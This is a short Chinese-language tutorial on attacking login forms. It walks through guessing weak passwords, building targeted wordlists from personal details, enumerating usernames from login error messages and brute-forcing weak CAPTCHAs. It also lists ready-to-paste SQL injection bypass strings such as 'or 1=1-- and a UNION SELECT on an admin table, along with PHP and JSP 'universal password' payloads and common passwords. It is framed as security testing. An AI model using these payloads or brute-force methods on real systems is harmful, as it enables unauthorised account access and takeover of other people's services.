方法 / 步驟 一: 手動探測 先手動猜測幾個可能的弱口令,主要是判斷站點有沒有做登錄失敗次數限制,若沒有限制,則可以使用工具字典工具進行測試 二: 使用字典測試 2.1 字典生成思路 國內很多安全測試團隊,常用的弱口令檢測方案一般有由以下依據組成 姓名的全拼+數字 / 姓名首字母+數字 / 姓全拼+名的首字母+數字； 鍵盤分布或 Shift+鍵盤布局； 好記的數字/ 字母組合： 比如工號,特殊節日、紀念日、年月； 特殊含義的單詞、好記的特殊字符組合、特殊含義的字母用數字替換等。 國內常用名TOP 常見組合； 2.2 字典使用策略 收集相關信息，使用社工字典生成等針對該服務工具，可對用戶名和密碼同時測試，也可以通過用戶名登錄失敗返回的信息判斷這個賬號在系統中是否存在,如果存在則可以進一步進行對該賬號的密碼檢測。 但現在很多服務為了防止系統遭受暴力請求/DDOS攻擊 / 識別用戶身份等 會使用驗證碼機制。通常在網站的 登錄/密碼找回/用戶注冊 使用驗證碼，但當這些驗證碼具有一定的規律性并且沒有做好對應的防護措施時會導致攻擊者通過爆破等方式猜解/繞過驗證碼機制，可導致任意用戶注冊、批量注冊無用賬戶、重置任意用戶密碼、獲取系統權限等危害。 常見的驗證碼主要有圖片驗證碼,郵件/短信驗證碼, 滑動/語音驗證碼。 2.3 弱口令常用文本 ``` 'xor 'or''=' 'or'='or' "or "a"="a ')or('a'='a 'or'a'='a "or"="a'='a or 1=1-- 'or 1=1-- a'or' 1=1-- "or 1=1-- 1 or '1'='1'=1 1 or '1'='1' or 1=1 'OR 1=1 "or 1=1 ``` 2.4 DB注入常用檢測若口令: 用戶名 通常是替換表名admin(將下面整個復制粘貼到用戶名輸入框) ' UNION Select 1,1,1 FROM admin Where ''=' 密碼: 1 2.5 PHP萬能密碼/弱口令: 'or 1=1/* 2.6 JSP站點常用/萬能密碼/弱口令: ``` 1'or'1'='1 12345 123456 1234567 12345678 123456789 Password P@ssw0rd abc123 ```